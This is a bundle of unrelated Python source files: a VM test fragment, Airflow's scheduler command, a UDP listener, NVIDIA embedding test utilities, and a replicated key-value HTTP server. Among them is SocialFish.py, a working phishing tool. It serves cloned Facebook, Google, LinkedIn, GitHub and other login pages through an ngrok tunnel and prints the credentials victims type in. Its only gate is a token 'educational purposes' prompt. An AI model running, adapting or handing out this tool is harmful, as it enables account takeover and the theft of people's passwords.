cond = res_ops.gen_query_conditions('name', '=', vm_name)
vms = res_ops.query_resource_count(res_ops.VM_INSTANCE, cond, session_uuid)
con_ops.change_global_config('identity', 'session.timeout', session_to, session_uuid)
con_ops.change_global_config('identity', 'session.maxConcurrent', session_mc, session_uuid)
if vms == org_num:
test_util.test_pass('Create %d VMs Test Success' % org_num)
else:
test_util.test_fail('Create %d VMs Test Failed. Only find %d VMs.' % (org_num, vms))
#Will be called only if exception happens in test().
def error_cleanup():
if session_to:
con_ops.change_global_config('identity', 'session.timeout', session_to, session_uuid)
if session_mc:
con_ops.change_global_config('identity', 'session.maxConcurrent', session_mc, session_uuid)
if session_uuid:
acc_ops.logout(session_uuid)
|
scheduler_command.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Scheduler command"""
import signal
from multiprocessing import Process
from typing import Optional
import daemon
from daemon.pidfile import TimeoutPIDLockFile
from airflow import settings
from airflow.jobs.scheduler_job import SchedulerJob
from airflow.utils import cli as cli_utils
from airflow.utils.cli import process_subdir, setup_locations, setup_logging, sigint_handler, sigquit_handler
def _create_scheduler_job(args):
job = SchedulerJob(
subdir=process_subdir(args.subdir),
num_runs=args.num_runs,
do_pickle=args.do_pickle,
)
return job
@cli_utils.action_logging
def scheduler(args):
"""Starts Airflow Scheduler"""
skip_serve_logs = args.skip_serve_logs
print(settings.HEADER)
if args.daemon:
pid, stdout, stderr, log_file = setup_locations(
"scheduler", args.pid, args.stdout, args.stderr, args.log_file
)
handle = setup_logging(log_file)
with open(stdout, 'w+') as stdout_handle, open(stderr, 'w+') as stderr_handle:
ctx = daemon.DaemonContext(
pidfile=TimeoutPIDLockFile(pid, -1),
files_preserve=[handle],
stdout=stdout_handle,
stderr=stderr_handle,
)
with ctx:
job = _create_scheduler_job(args)
sub_proc = _serve_logs(skip_serve_logs)
job.run()
else:
job = _create_scheduler_job(args)
signal.signal(signal.SIGINT, sigint_handler)
signal.signal(signal.SIGTERM, sigint_handler)
signal.signal(signal.SIGQUIT, sigquit_handler)
sub_proc = _serve_logs(skip_serve_logs)
job.run()
if sub_proc:
sub_proc.terminate()
def _serve_logs(skip_serve_logs: bool = False) -> Optional[Process]:
"""Starts serve_logs sub-process"""
from airflow.configuration import conf
from airflow.utils.serve_logs import serve_logs
if conf.get("core", "executor") in ["LocalExecutor", "SequentialExecutor"]:
if skip_serve_logs is False:
sub_proc = Process(target=serve_logs)
sub_proc.start()
return sub_proc
return None
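# Usage note (assumed from the args object consumed above, not confirmed by this
# file): this module backs the `airflow scheduler` CLI entry point; running it
# with the daemon flag (args.daemon) takes the DaemonContext branch, otherwise
# signal handlers are installed and the SchedulerJob runs in the foreground.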
|
pySmartListener.py
|
import socket
import sys
import select
import threading
import data_file
import time
from utils import current_milli_time
buffer_size = 1 * 1024 * 1024
def socket_to_file(port, filename):
host = "0.0.0.0"
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
f = open(filename, 'wb')
try:
data, addr = s.recvfrom(buffer_size)
last_time = current_milli_time()
while data:
# print "Received Data"
if len(data) >= buffer_size:
print "Received Data of buffer size(!), increase buffer size"
data_file.add_packet(f, current_milli_time() - last_time, data)
last_time = current_milli_time()
s.settimeout(None)
data, addr = s.recvfrom(buffer_size)
except socket.timeout:
f.close()
s.close()
print "Socket Error"
streaming_port = 5000
flight_data_port = 5001
t1 = threading.Thread(target=socket_to_file, args=(streaming_port, "streaming.dat"))
t1.daemon = True
t1.start()
t2 = threading.Thread(target=socket_to_file, args=(flight_data_port, "flight_data.dat"))
t2.daemon = True
t2.start()
while t1.is_alive() or t2.is_alive():
time.sleep(0.1)
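# Usage sketch (illustrative, assumes the listener above is running on localhost):
# a test packet can be pushed into streaming.dat from another shell with
#   python -c "import socket; socket.socket(socket.AF_INET, socket.SOCK_DGRAM).sendto(b'hi', ('127.0.0.1', 5000))"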
|
utils.py
|
"""
Copyright (c) 2021, NVIDIA CORPORATION.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
sys.path.append("../../") # where to find plugin
import sparse_operation_kit as sok
import tensorflow as tf
import pickle
import numpy as np
from multiprocessing import Process
local_ips = ("localhost", "127.0.0.1", "0.0.0.0")
def get_local_ip(hostname=None):
    import socket
    return socket.gethostbyname(hostname or socket.gethostname())
def is_local_ip(ip_address):
return True if ip_address in local_ips else False
def all_ips_in_local(ips):
for ip in ips:
if not is_local_ip(ip):
return False
return True
def get_local_gpu_count():
import os
text = os.popen("nvidia-smi --list-gpus").read()
text = text.strip().split("\n")
return len(text)
def get_cuda_version():
import os, re
text = os.popen("nvcc --version").read()
version = text.strip().split("\n")[-1]
version = re.search("cuda_\d+.\d+.", version).group(0)
version = re.search("\d+.\d+", version).group(0)
return version
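# Example (illustrative): if the last line of `nvcc --version` reads
# "Build cuda_11.2.r11.2/compiler.29373293_0", get_cuda_version() returns "11.2".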
class TestProcess(object):
def __init__(self,
func,
task_id,
arguments):
self.func = func
self.task_id = task_id
self.arguments = arguments
self.arguments.task_id = self.task_id
self.process = Process(target=self.func, args=(self.arguments,))
def start(self):
self.process.start()
def join(self):
if self.process.is_alive():
self.process.join()
def save_to_file(filename, *args):
with open(filename, 'wb') as file:
num_of_items = len(args)
if (num_of_items == 0):
raise ValueError("Nothing needed to be saved.")
pickle.dump(num_of_items, file, pickle.HIGHEST_PROTOCOL)
for item in args:
pickle.dump(item, file, pickle.HIGHEST_PROTOCOL)
print("[INFO]: dumpped items to file %s" %filename)
def restore_from_file(filename):
results = list()
with open(filename, "rb") as file:
num_of_items = pickle.load(file)
for _ in range(num_of_items):
item = pickle.load(file)
results.append(item)
print("[INFO] loadded from file %s" %filename)
return tuple(results)
def get_embedding_optimizer(optimizer_type):
if not isinstance(optimizer_type, str):
raise ValueError("optimizer_type must be str type, but got ", type(optimizer_type))
if optimizer_type == "plugin_adam":
return sok.optimizers.Adam
elif optimizer_type == 'adam':
return tf.keras.optimizers.Adam
elif optimizer_type == 'sgd':
return tf.keras.optimizers.SGD
else:
raise ValueError("Not supported optimizer_type: %s" %optimizer_type)
def get_dense_optimizer(optimizer_type):
if not isinstance(optimizer_type, str):
raise ValueError("optimizer_type must be str type, but got ", type(optimizer_type))
if optimizer_type == "plugin_adam":
return tf.keras.optimizers.Adam
elif optimizer_type == 'adam':
return tf.keras.optimizers.Adam
elif optimizer_type == 'sgd':
return tf.keras.optimizers.SGD
else:
raise ValueError("Not supported optimizer_type: %s" %optimizer_type)
def get_ones_tensor(max_vocab_size_per_gpu,
embedding_vec_size,
num,
task_id=None):
tensor = np.ones(shape=[max_vocab_size_per_gpu, embedding_vec_size], dtype=np.float32)
all_tensors = [tensor for _ in range(num)]
return all_tensors
def generate_random_samples(num_of_samples,
vocabulary_size,
slot_num,
max_nnz,
dtype=np.int64,
use_sparse_mask=True):
"""
    This function generates random samples for training.
#args:
num_of_samples: integer, how many samples should be generated.
vocabulary_size: integer,
slot_num: integer,
max_nnz: integer
        use_sparse_mask: boolean, whether to use a sparse mask to generate sparse data
#returns:
all_keys: dense tensor, whose shape is [num_of_samples, slot_num, max_nnz]
all_labels: dense tensor, whose shape is [num_of_samples, 1]
"""
print("[INFO]: begin to generate random samples")
from tensorflow.python.distribute.values import PerReplica
cuda_version = get_cuda_version()
cuda_version = "".join(cuda_version.split("."))
try:
import cupy as cp
except:
import os
os.system("pip install cupy-cuda"+cuda_version)
import cupy as cp
if (vocabulary_size // slot_num <= 2 * max_nnz):
raise ValueError("Too small vocabulary_size. vocabulary_size: %d // slot_num: %d = %d <= 2 * max_nnz: %d"
%(vocabulary_size, slot_num, vocabulary_size // slot_num, 2 * max_nnz))
if use_sparse_mask:
mask = np.random.choice([-1, 1], size=(num_of_samples, slot_num, max_nnz))
filter_ = np.ones(shape=(num_of_samples, slot_num, max_nnz))
sum_ = np.sum(mask * filter_, axis=-1, keepdims=True)
index = np.where(sum_ == -max_nnz)
index = tuple(map(lambda array: array[1:] if array.ndim and array.size else array, index))
mask[index] = 1
with cp.cuda.Device(0):
all_keys = cp.zeros(shape=(num_of_samples, slot_num, max_nnz), dtype=cp.int64)
random_kernel = cp.RawKernel(r'''
__device__ size_t randInt(size_t gid, const size_t range) {
return (((gid * clock() * 214013L + 2531011L) >> 16) & 0x7fff) % range;
}
extern "C" __global__
void my_kernel(long long *nums, const size_t count,
const size_t slot_num, const size_t max_nnz,
const size_t vocab_per_slot) {
size_t gid = blockIdx.x * blockDim.x + threadIdx.x;
for (size_t i = gid; i < count; i += blockDim.x * gridDim.x) {
size_t tid_in_sample = i % (slot_num * max_nnz);
size_t slot_id = tid_in_sample / max_nnz;
size_t col_id = tid_in_sample % max_nnz;
nums[i] = vocab_per_slot * slot_id + randInt(gid, vocab_per_slot);
}
}
''', 'my_kernel')
random_kernel((num_of_samples,), (1024,),
(all_keys, num_of_samples * slot_num * max_nnz,
slot_num, max_nnz, vocabulary_size // slot_num))
all_keys = all_keys.get()
if use_sparse_mask:
all_keys[mask == -1] = -1
all_keys = np.sort(all_keys, axis=-1)[:,:,::-1]
all_labels = np.random.randint(low=0, high=2, size=(num_of_samples, 1))
print("[INFO]: generated random samples")
return all_keys, all_labels
def tf_dataset(keys, labels,
batchsize,
to_sparse_tensor=False,
repeat=None):
num_of_samples, slot_num, max_nnz = keys.shape
def _convert_to_sparse(keys, labels):
if tf.rank(keys) != 2:
keys = tf.reshape(keys, shape=[-1, max_nnz])
indices = tf.where(keys != -1)
values = tf.gather_nd(keys, indices)
return tf.sparse.SparseTensor(indices=indices,
values=values,
dense_shape=[batchsize * slot_num, max_nnz]), labels
dataset = tf.data.Dataset.from_tensor_slices((keys, labels))
dataset = dataset.repeat(repeat)
dataset = dataset.batch(batchsize)
if to_sparse_tensor:
dataset = dataset.map(lambda keys, labels:
_convert_to_sparse(keys, labels),
num_parallel_calls=1)
return dataset
def try_make_dirs(directory, chief=True):
import os
if not os.path.exists(directory) and chief:
os.makedirs(directory)
def sort_embedding_variables_by_key(keys, embedding_values, embedding_vec_size):
"""
    This function sorts the embedding values by their corresponding keys.
For example, keys: [5, 3, 6, 1], embedding values: [[0, 0, 0, 0],
[1, 1, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3]]
After sorted, keys: [1, 3, 5, 6], embedding values: [[3, 3, 3, 3],
[1, 1, 1, 1],
[0, 0, 0, 0],
[2, 2, 2, 2]]
"""
cuda_version = get_cuda_version()
cuda_version = "".join(cuda_version.split("."))
try:
import cupy as cp
except:
import os
os.system("pip install cupy-cuda"+cuda_version)
import cupy as cp
if not isinstance(keys, np.ndarray):
keys = np.array(keys, dtype=np.int64)
if not isinstance(embedding_values, np.ndarray):
embedding_values = np.array(embedding_values, dtype=np.float32)
sorted_indexes = np.argsort(keys)
sorted_keys = keys[sorted_indexes]
with cp.cuda.Device(0):
d_sorted_values = cp.zeros(shape=embedding_values.shape, dtype=cp.float32)
d_sorted_indexes = cp.asarray(sorted_indexes)
d_embedding_values = cp.asarray(embedding_values)
sort_values_kernel = cp.RawKernel(r'''
extern "C" __global__
void my_kernel(const size_t *sorted_indexes,
const float *values,
float *sorted_values,
const size_t values_step,
const size_t count) {
const size_t col_id = threadIdx.x;
for (size_t row_id = blockIdx.x; row_id < count; row_id += blockDim.x) {
sorted_values[row_id * values_step + col_id] =
values[sorted_indexes[row_id] * values_step + col_id];
}
}
''', 'my_kernel')
sort_values_kernel((keys.size,), (embedding_vec_size,),
(d_sorted_indexes, d_embedding_values, d_sorted_values,
embedding_vec_size, keys.size))
sorted_values = d_sorted_values.get()
return sorted_keys, sorted_values
def read_binary_file(filename,
element_type,
chunk_num_elements=65536):
import struct, os
element_type_map = {"float": ["f", 4],
"int32": ["i", 4],
"long long": ["q", 8],
"unsigned long long": ["Q", 8],
"size_t": ["N", 8]}
elem_size_in_bytes = element_type_map[element_type][1]
file_size_in_bytes = os.path.getsize(filename)
if (file_size_in_bytes % elem_size_in_bytes != 0):
raise ValueError("Invalid element size for file: %s." %filename)
chunk_size_in_bytes = chunk_num_elements * elem_size_in_bytes
if (file_size_in_bytes <= chunk_size_in_bytes):
chunk_size_in_bytes = file_size_in_bytes
chunk_count = 1
else:
chunk_count = file_size_in_bytes // chunk_size_in_bytes
results = list()
with open(filename, "rb") as file:
for _ in range(chunk_count):
buffer = file.read(chunk_size_in_bytes)
if (0 == len(buffer)):
raise RuntimeError("Error in reading file.")
elements = struct.unpack(str(chunk_size_in_bytes // elem_size_in_bytes) +
element_type_map[element_type][0],
buffer)
results += elements
if (file_size_in_bytes - chunk_count * chunk_size_in_bytes > 0):
buffer_size_in_bytes = file_size_in_bytes - chunk_count * chunk_size_in_bytes
buffer = file.read(buffer_size_in_bytes)
elements = struct.unpack(str(buffer_size_in_bytes // elem_size_in_bytes) +
element_type_map[element_type][0],
buffer)
results += elements
return results
def get_valid_tf_values(keys, values):
if not isinstance(keys, np.ndarray):
keys = np.array(keys, dtype=np.int64)
if not isinstance(values, np.ndarray):
values = np.array(values, dtype=np.float32)
keys = tf.reshape(keys, [-1])
return tf.gather(values, keys).numpy()
if __name__ == "__main__":
all_keys, all_labels = generate_random_samples(num_of_samples=65536 * 100,
vocabulary_size=8 * 1024 * 1,
slot_num=10,
max_nnz=4,
use_sparse_mask=False)
# print("all_keys:\n", all_keys)
# print("all_labels:\n", all_labels)
dataset = tf_dataset(keys=all_keys, labels=all_labels,
batchsize=65536,
to_sparse_tensor=False,
repeat=1)
for i, (input_tensors, labels) in enumerate(dataset):
print("-"*30, "Iteration ", str(i), "-"*30)
print(input_tensors)
print(labels)
# a = [1, 2, 3]
# b = [4, 5]
# save_to_file("./test.file", a, b)
# a = restore_from_file("./test.file")
# print(a)
# local_ip = get_local_ip()
# print("local_ip: %s" %local_ip)
# keys = np.array([5, 3, 6, 1], dtype=np.int64)
# values = np.array([[0, 0, 0, 0],
# [1, 1, 1, 1],
# [2, 2, 2, 2],
# [3, 3, 3, 3]], dtype=np.float32)
# sorted_keys, sorted_values = sort_embedding_variables_by_key(keys, values, embedding_vec_size=4)
# print(sorted_keys)
# print(sorted_values)
# filename = r"./embedding_variables/test_values.file"
# keys = read_binary_file(filename, element_type="float")
# print(len(keys))
# keys = [5, 3, 6, 1]
# values = [[0, 0],
# [1, 1],
# [2, 2],
# [3, 3],
# [4, 4],
# [5, 5],
# [6, 6]]
# print(get_valid_tf_values(keys, values))
|
SocialFish.py
|
#-*- coding: utf-8 -*-
# SOCIALFISH
# by: UNDEADSEC
#
###########################
from time import sleep
from sys import stdout, exit
from os import system, path
import multiprocessing
from urllib import urlopen
from platform import architecture
from wget import download
RED, WHITE, CYAN, GREEN, END = '\033[91m', '\33[46m', '\033[36m', '\033[1;32m', '\033[0m'
def connected(host='http://duckduckgo.com'):
try:
urlopen(host)
return True
except:
return False
if connected() == False:
print '''
....._____....... ____ ____ ____ _ ____ _ ____ _ ____ _ _
/ \/| [__ | | | | |__| | |___ | [__ |__|
\o__ /\| ___] |__| |___ | | | |___ | | ___] | |
\|
{0}[{1}!{0}]{1} Network error. Verify your connection.\n
'''.format(RED, END)
exit(0)
def checkNgrok():
if path.isfile('Server/ngrok') == False:
print '[*] Downloading Ngrok...'
if architecture()[0] == '64bit':
filename = 'ngrok-stable-linux-amd64.zip'
else:
filename = 'ngrok-stable-linux-386.zip'
url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename
download(url)
system('unzip ' + filename)
system('mv ngrok Server/ngrok')
system('rm -Rf ' + filename)
system('clear')
checkNgrok()
def end():
system('clear')
print '''
S O C I A L{2}
|\ \ \ \ \ \ \ \ __ ___
| \ \ \ \ \ \ \ \ | O~-_ _-~~ ~~-_
| >----|-|-|-|-|-|-|--| __/ / {1}DON'T{2} )
| / / / / / / / / |__\ < {1}FORGET{2} )
|/ / / / / / / / \_ {1}ME !{2} _)
{1}F I S H{2} ~--___--~
{1}[ {0}Watch us on YouTube:{1} https://youtube.com/c/UndeadSec ]
[ {0}Follow me on Twitter:{1} https://twitter.com/A1S0N_ ]
[ {0}Contribute on Github:{1} https://github.com/UndeadSec/SocialFish ]
[ {0}Join our Telegram Group(Portuguese):{1} https://t.me/UndeadSec ]\n'''.format(GREEN, END, CYAN)
def loadModule(module):
print '''{0}
_.-=-._ .-,
.' "-.,' /
( _. <
`=.____.=" `._\\
[{1}*{0}]{1} %s module loaded.{0}'''.format(CYAN, END) % module
def runPhishing(social, option2):
system('rm -Rf Server/www/*.* && touch Server/www/cat.txt')
if option2 == '1' and social == 'Facebook':
system('cp WebPages/fb_standard/*.* Server/www/')
if option2 == '2' and social == 'Facebook':
system('cp WebPages/fb_advanced_poll/*.* Server/www/')
elif option2 == '1' and social == 'Google':
system('cp WebPages/google_standard/*.* Server/www/')
elif option2 == '2' and social == 'Google':
system('cp WebPages/google_advanced_poll/*.* Server/www/')
elif social == 'LinkedIN':
system('cp WebPages/linkedin/*.* Server/www/')
elif social == 'Github':
system('cp WebPages/github/*.* Server/www/')
elif social == 'StackOverflow':
system('cp WebPages/stackoverflow/*.* Server/www/')
elif social == 'VK':
system('cp WebPages/vk/*.* Server/www/')
def waitCreds():
print " {0}[{1}*{0}]{1} Waiting for credentials... \n".format(GREEN, END)
while True:
with open('Server/www/cat.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
print ' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines
system('rm -rf Server/www/cat.txt && touch Server/www/cat.txt')
creds.close()
def runPEnv():
system('clear')
print ''' {2}-{1} UNDEADSEC {2}|{1} t.me/UndeadSec {2}|{1} youtube.com/c/UndeadSec {2}- BRAZIL
'
' '
' '
. ' . ' '
' ' ' ' '
███████ ████████ ███████ ██ ███████ ██ ███████ ██ ███████ ██ ██
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ██ ██ ██ ██ ███████ ██ █████ ██ ███████ ███████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ████████ ███████ ██ ██ ██ ███████ ██ ██ ███████ ██ ██
. ' '....' ..'. ' .
' . . ' ' ' {1}v1.0{2}
' . . . . . '. .' ' .
' ' '. ' {1}UA DESIGNER | VK SERVER | FOX | KRAMATORSK{2}
' ' '
' . '
'
{1}'''.format(GREEN, END, CYAN)
for i in range(101):
sleep(0.01)
stdout.write("\r{0}[{1}*{0}]{1} Preparing environment... %d%%".format(CYAN, END) % i)
stdout.flush()
print "\n\n{0}[{1}*{0}]{1} Searching for PHP installation... ".format(CYAN, END)
if 256 != system('which php'):
print " --{0}>{1} OK.".format(CYAN, END)
else:
print " --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again. http://www.php.net/".format(RED, END)
exit(0)
    if raw_input(" {0}[{1}!{0}]{1} Will you use this tool only for educational purposes? (y/n)\n {2}SF > {1}".format(RED, END, CYAN)).upper() == 'N':
system('clear')
print '\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL{1} ]\n'.format(RED, END)
exit(0)
option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIN\n\n {0}[{1}4{0}]{1} Github\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}SF > {1}".format(CYAN, END))
if option == '1':
loadModule('Facebook')
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}SF > {1}".format(CYAN, END))
runPhishing('Facebook', option2)
elif option == '2':
loadModule('Google')
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}SF > {1}".format(CYAN, END))
runPhishing('Google', option2)
elif option == '3':
loadModule('LinkedIN')
option2 = ''
runPhishing('LinkedIN', option2)
elif option == '4':
loadModule('Github')
option2 = ''
runPhishing('Github', option2)
elif option == '5':
loadModule('StackOverflow')
option2 = ''
runPhishing('StackOverflow', option2)
elif option == '6':
loadModule('WordPress')
option2 = ''
runPhishing('WordPress', option2)
else:
exit(0)
def runNgrok():
system('./Server/ngrok http 80 > /dev/null &')
sleep(10)
system('curl -s http://127.0.0.1:4040/status | grep -P "https://.*?ngrok.io" -oh > ngrok.url')
url = open('ngrok.url', 'r')
print('\n {0}[{1}*{0}]{1} Ngrok URL: {2}' + url.readlines()[0] + '{1}').format(CYAN, END, GREEN)
url.close()
def runServer():
system("cd Server/www/ && php -S 127.0.0.1:80")
if __name__ == "__main__":
try:
runPEnv()
runNgrok()
multiprocessing.Process(target=runServer).start()
waitCreds()
except KeyboardInterrupt:
system('pkill -f ngrok')
end()
exit(0)
|
simple_http_server.py
|
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from urllib.parse import urlparse
import json
import sys
import datetime
import plyvel
import requests
import threading
rec = False
class RequestHandler(BaseHTTPRequestHandler):
protocol_version = "HTTP/1.1"
def do_GET(self):
print(threading.currentThread().getName())
parsed_path = urlparse(self.path)
# handle read request
if parsed_path.path == "/kv/":
            # the database is still recovering
if not rec:
message = json.dumps({"is_key_in": "NA"})
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.send_header("Content-Length", len(message))
self.end_headers()
self.wfile.write(message.encode())
return
# print('key is = ', parsed_path.query.split("=")[-1])
print("receive read request")
k = parsed_path.query.split("=")[-1]
v = db1.get(k.encode())
s = {"is_key_in": "yes", "value": v.decode()} if v else {"is_key_in": "no", "value": "None"}
message = json.dumps(s)
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.send_header("Content-Length", len(message))
self.end_headers()
self.wfile.write(message.encode())
return
        # data recovery from failure
if parsed_path.path == "/rec/":
print("receive recover request")
if not rec:
message = json.dumps({})
self.send_response(400)
self.send_header('Content-type', 'application/json')
self.send_header("Content-Length", len(message))
self.end_headers()
self.wfile.write(message.encode())
return
t = parsed_path.query.split("=")[-1]
dic = {}
for k, v in db2.iterator(start=t.encode()):
dic[k.decode()] = v.decode()
message = json.dumps(dic)
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.send_header("Content-Length", len(message))
self.end_headers()
self.wfile.write(message.encode())
return
def do_POST(self):
        print(threading.current_thread().name)
content_len = int(self.headers.get('Content-Length'))
post_body = self.rfile.read(content_len)
data = json.loads(post_body.decode())
parsed_path = urlparse(self.path)
# direct write request
if parsed_path.path == "/kv/":
# print("post key is = ", data['k'])
# print("post value is = ", data['v'])
print("receive write request")
t = str(datetime.datetime.now())
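            # db2 keys have the form "<timestamp>[<key>", so an ordered scan of db2
            # replays writes in time order and split("[") recovers both parts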
k, v = data['k'], data['v']
old_t = db3.get(k.encode())
if old_t:
# delete old timestamp
db2.delete((old_t.decode() + "[" + k).encode())
# add new timestamp with this key
db2.put((t + "[" + k).encode(), v.encode())
# update timestamp
db3.put(k.encode(), t.encode())
# record key-value
old_v = db1.get(k.encode())
# update value
db1.put(k.encode(), v.encode())
# launch http request to sync data for other servers
# even if a server crashes, we will still try to sync with it
for port in server_ports:
if port != server_port:
try:
r = requests.post(url = 'http://%s:%s/sync/' % (server_ip, port), json = {"k": k, "v": v, "t": t}, timeout=3)
except (requests.ConnectionError, requests.Timeout):
print("Sync Timeout: process %s:%s dead!" % (server_ip, port))
s = {"is_key_in": "yes", "old_value": old_v.decode()} if old_v else {"is_key_in": "no", "old_value": "None"}
message = json.dumps(s)
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.send_header("Content-Length", len(message))
self.end_headers()
self.wfile.write(message.encode())
# data sync during run-time
if parsed_path.path == "/sync/":
# print("post key is = ", data['k'])
# print("post value is = ", data['v'])
# print("post timestamp is = ", data['t'])
print("receive sync request")
k, v, t = data['k'], data['v'], data['t']
old_t = db3.get(k.encode())
if old_t:
# delete old timestamp
db2.delete((old_t.decode() + "[" + k).encode())
# add new timestamp with this key
db2.put((t + "[" + k).encode(), v.encode())
# update timestamp
db3.put(k.encode(), t.encode())
# update value
db1.put(k.encode(), v.encode())
message = json.dumps({})
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.send_header("Content-Length", len(message))
self.end_headers()
self.wfile.write(message.encode())
def recover_db():
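    """Rebuild local state after a restart.

    Looks up the newest timestamp already present in db2, asks each peer's
    /rec/ endpoint for everything written since then, replays entries that
    are newer than the local copy, and finally sets the global `rec` flag so
    the request handlers start serving reads.
    """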
global rec
print("start db recover process...")
# start the recover process
# get the latest timestamp in db
    try:
        # plyvel iterator keys are bytes: decode before splitting off the timestamp
        latest_t = next(db2.iterator(reverse=True))[0].decode().split("[")[0]
    except StopIteration:
        # db2 is empty (fresh node): ask peers for everything
        latest_t = "0000-00-00 00:00:00.000000"
for port in server_ports:
if port != server_port:
try:
r = requests.get(url = 'http://%s:%s/rec/?t=%s' % (server_ip, port, latest_t))
except requests.ConnectionError:
print("Sync Timeout: process %s:%s dead!" % (server_ip, port))
else:
if r.status_code == 200:
# write to db
for tk, v in r.json().items():
t, k = tk.split("[")[:2]
old_t = db3.get(k.encode())
                        # keep the local copy when it is at least as new as the recovered entry
                        if old_t and old_t.decode() >= t:
                            continue
else:
if old_t:
# delete old timestamp
db2.delete((old_t.decode() + "[" + k).encode())
# add new timestamp
db2.put((t + "[" + k).encode(), v.encode())
# update timestamp
db3.put(k.encode(), t.encode())
# update value
db1.put(k.encode(), v.encode())
# done with the recovery
break
else:
print("Wrong Status Code: process %s:%s not ready!" % (server_ip, port))
rec = True
print("finish db recover process")
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
if __name__ == '__main__':
server_ip, server_ports, server_index = sys.argv[1], sys.argv[2].split(','), int(sys.argv[3])
server_port = server_ports[server_index]
# reconnect to the database
# key->value
db1 = plyvel.DB('/tmp/cs739db-%s-1/' % server_port, create_if_missing=True)
# timestamp+key->value
db2 = plyvel.DB('/tmp/cs739db-%s-2/' % server_port, create_if_missing=True)
# key->timestamp
db3 = plyvel.DB('/tmp/cs739db-%s-3/' % server_port, create_if_missing=True)
# set recover flag
rec = False
# launch a thread for data recovery
threading.Thread(target=recover_db).start()
server = ThreadedHTTPServer((server_ip, int(server_port)), RequestHandler)
print('Starting server at http://%s:%s' % (server_ip, server_port))
server.serve_forever()
|
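kv_client_example.py
|
# A minimal client sketch for simple_http_server.py above. The file name,
# host and port are illustrative assumptions; the /kv/ endpoint, the query
# string for reads and the JSON bodies for writes are taken from the server code.
import requests

BASE = "http://127.0.0.1:8000"  # assumed address of one running replica

# write a key; the reply carries the previous value stored for that key, if any
resp = requests.post(BASE + "/kv/", json={"k": "hello", "v": "world"})
print(resp.json())  # e.g. {"is_key_in": "no", "old_value": "None"}

# read it back; the server takes whatever follows the last '=' as the key
resp = requests.get(BASE + "/kv/", params={"key": "hello"})
print(resp.json())  # e.g. {"is_key_in": "yes", "value": "world"}
|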